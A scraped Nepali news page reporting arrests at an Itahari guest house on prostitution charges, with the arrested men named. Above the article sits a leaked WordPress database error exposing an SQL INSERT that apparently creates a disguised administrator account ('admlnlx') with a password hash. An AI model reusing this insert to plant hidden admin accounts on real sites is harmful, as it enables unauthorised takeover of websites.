WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6f.OBfAZURgdWgMk/fcUgNlLNk6Q31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:46:12', '', 'admlnlx', 'admlnlx')
चितवन,पुस २९-
यौनधन्दामा संलग्न भएकोे अभियोगमा इटहरी स्थित सुविधा गेष्ट हाउसबाट प्रहरीले पाँच जना युवा सहित तीन जना युवतीलाई पक्राउ गरेको छ । नियन्त्रणमा लिइएका पूरुष भारतीय नागरिक भएको प्रहरीले जनाएको छ । गेष्ट हाउँसबाट महोत्तरी लक्ष्मीनिया वडा नं. २ का दिनेशकुमार यादव, सुनसरी धरान घर भई हाल दार्जेलिङ् बस्ने रविन विश्वकर्मा, दार्जेलिङ्कै चन्द्र प्रसाद, राजकुमार प्रसाद र समित अग्रवाल सहित तीन युवतीलाई प्रहरीले नियन्त्रणमा लिएको छ ।
पक्राउ परेकाहरूलाई विहीबार प्रहरीले सार्वजनिक अपराध ऐन अन्तर्गत मुद्दा चलाएको इटहरीका डिएसपी नरेशराज सुवेदीले बताए । इटहरीमा यौन धन्दा मौलाउँदै गए पछि प्रहरीले क्याविन–रेष्टुरेन्टसँगै होटलहरुमा कडाई गदैं आएको छ । पछिल्लो समय भारतीय ग्राहकलाई बोलाई युवतीहरुले यौन धन्दा चलाउने गरेको प्रहरी अनुसन्धानबाट खुल्न गएकाे छ ।